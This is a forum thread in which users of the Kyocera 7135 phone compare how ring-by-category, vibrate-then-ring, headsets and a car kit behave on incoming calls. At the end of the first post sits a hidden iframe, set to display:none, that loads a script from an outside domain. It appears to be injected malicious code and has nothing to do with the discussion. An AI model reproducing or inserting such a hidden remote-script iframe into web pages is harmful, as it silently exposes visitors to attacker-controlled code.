+ Reply to Thread

Incoming Calls - Vibe/Ring & Ring By Catagory

I was having some problems with jazmaan's PF's timering in my car today so I did some testing of how the 7135 handles incoming calls with the various incoming call preferances. I tested three different ways, first the phone only, then the phone w kyo stereo headsets and finally with the kyo car kit. The results are a little disturbing to me.

Phone Only - if the pref's are Ring Only then the ring by catagory (RBC) appears to work fine. I got about a half ring from the default ringer then it kicked into the RBC ringer. I assume this is just a result of the call coming in and caller id taking a second.
    If the prefs are vibe then ring (I used to use this alot) I can only get the default ringer type, i.e. RBC did not work for me if I was set to vibe then ring.

Headsets - I could not get the RBC to work at all either w vibe then ring or ring only. The vibe then ring worked ok so if I was listeneing to a MP3 I got the vibe. Actually the vibe would happen while the nice lady was saying incoming call answer. I think this may be a clue to some other things that happen when the car kit is used (the ringer sometimes steps on the nice ladys voice).

Car kit - these were the oddest results. In ring only w RBC, the RBC didnt work. In vibe then ring with RBC on, I would get the vibe and then the RBC ringer would step on the nice ladys voice making it virtually impossible for me to say yes and have the call piked up over the speaker. In vibe then ring w no RBC I would NOT get the vibe and the ring steps on the lady.

If anyone else has had anything similar please let me know. I tested each of these scenarios w default ringers as well as downloaded ones with the same results.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Obviously Kyocera picked the wrong beta-testers!! Maybe next time they'll come HERE when they're searching for beta testers.

Boinker, do your hands hurt from having so much time on them?
    ~'kito
    pdaPhoneHome Moderator

Come on kito, thats not fair. You know you'd be doing the same sort of exploration if you had one. Now bite the bullet and go buy one at Alltel. :p

Thanks for the details Boinker. I had originally planned on using seperate recorded MP3's for category such as:

Incoming call from Work Associate or Incoming call from Friend but I haven't gotten around to it.

I don't have the car kit but do have the Stereo headset. I'll let you know if I have similar problems.

Originally posted by Markito
    Boinker, do your hands hurt from having so much time on them?
    Hey if you had a house full of rug rats (still love 'em ) juiced up on candy, in laws and the like - a half hour sittin in the car w a new toy is more like therapy.

Also, after posting some problems I thought I was having w jazmaan's PF ringer, I wanted to make sure I fully understood the real problem. Being I newbie to this and trying to search I was surprised not to find anything else like this thread as I use vibe then ring all the time and RBC. I am also in my car quite a bit so was very disappointed w the results.

pdageek, it is true that if I had one of those beauties, I would be up all night scrutinizing it.

Boinker, I too have lovely rugrats and in laws, so I completely understand. Just make sure that you aren't in the garage with the car running.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    Boinker, I too have lovely rugrats and in laws, so I completely understand. Just make sure that you aren't in the garage with the car running.
    :scream ROFL, thanks for the tip!

The lovely Mrs B didnt appreciate the time I spent in the car untill I told her what a worthy cause it was (guess I shouldnt have snuck off)!
    Thanks for yours and everyone elses input in this forum. It is truly unbelievable. Finally a word to other newbies out there, make a small donation, this place is worth it! All you feel is good

Originally posted by boinker
    :scream ROFL, thanks for the tip!

The lovely Mrs B didnt appreciate the time I spent in the car...(guess I shouldnt have snuck off)!
    Yeah, I get a lot of that too.

Originally posted by boinker
    Thanks for yours and everyone elses input in this forum. It is truly unbelievable.
    You are a big part of it too. Thanks for letting me live vicariously through your exploration of the 7135 until I get one.
    ~'kito
    pdaPhoneHome Moderator

When you say you couldn't get RBC to work with the headset, I assume you mean that the default ring rang instead of the RBC ring? Its not that the phone didn't ring at all, right?

I'm not much of a headset user anyway, I'll probably only use mine to listen to Mp3's.

It just occured to me that I can make RBC mp3's for each of my regular friend's "JAY'S CALLING!" "MARK'S CALLING!" etc. that way I don't have to remember which ring goes with who.

In fact I can take that a step further and record the voices of each of my regular friends saying "Hey Pick Up The Phone!".

Originally posted by jazmaan
    When you say you couldn't get RBC to work with the headset, I assume you mean that the default ring rang instead of the RBC ring? Its not that the phone didn't ring at all, right?
    Correct, the phone rang but it used the default ringer.

It just occured to me that I can make RBC mp3's for each of my regular friend's "JAY'S CALLING!" "MARK'S CALLING!" etc. that way I don't have to remember which ring goes with who.
    I was planning on doing something similar thats one of the reasons I tested it. I had some real problems w my 6035 and the incoming call voice so I wanted to see how this one worked. I am very disapointed with all the odd combinations that dont work.

Originally posted by jazmaan
    In fact I can take that a step further and record the voices of each of my regular friends saying "Hey Pick Up The Phone!".
    Very cool ideas jazmaan!
    ~'kito
    pdaPhoneHome Moderator

Anyone try any of these to confirm?

Here are my experiences...

If RBC is on, no headset, ring only: I get one ring cycle of the default ring before the catagory ring takes over. This makes sense, since CLID is not delivered until after the phone is alerted to an incoming call.

If Ring then Vibe is active, I only get default ring. RBC is ignored.

I'll report back after testing with the headset. I thought I tested, but now I can't remember the results. I know it was a bit quirky....

Alan

headset testing..

RBC on, headset plugged in. If Voice Answer is activated, RBC is ignored and the default ring plays. If Voice Answer is not active, RBC plays after one ring cycle of default ring.

My guess is that the car adapter will have the same behaviour, but I didn't buy one of those.

Also, with voice answer active, the ringing does not start until after it asks you twice if you want to answer the call, so if you are not wearing the headset, or like me, have the Jabra BT headset with Answer/Hangup emulation enabled, you won't know you have an incoming call for ~ 12 seconds.

Alan

So....If you where using the car kit and RBC then the phone rings and the lady asks if you want to answer, however you cant say Yes becasue the RBC ring starts playing?

What if your Custom Ringer started with your voice saying "Yes" -- would the 7135 hear its own reply and answer the call? that would be outright funnny!
    iPhone therefore iAm.

Would a tree be falling in the woods at that very moment?
    ~'kito
    pdaPhoneHome Moderator

....And would anybody have a 7135 there to record the sound into a voice memo?
    iPhone therefore iAm.

Hee hee!
    ~'kito
    pdaPhoneHome Moderator

Sorry to bring this back from the dead, but...

Today I realized that using the headset with Voice Answer enabled and the unit set to Vibe then Ring (with category ring enabled) the lady got "Inco" out before the default ring took over and I couldn't answer.

It had never done this with Ring Only set (have not tried Vibe only/Silent All set).

Is there a workaround/fix/hack for this yet?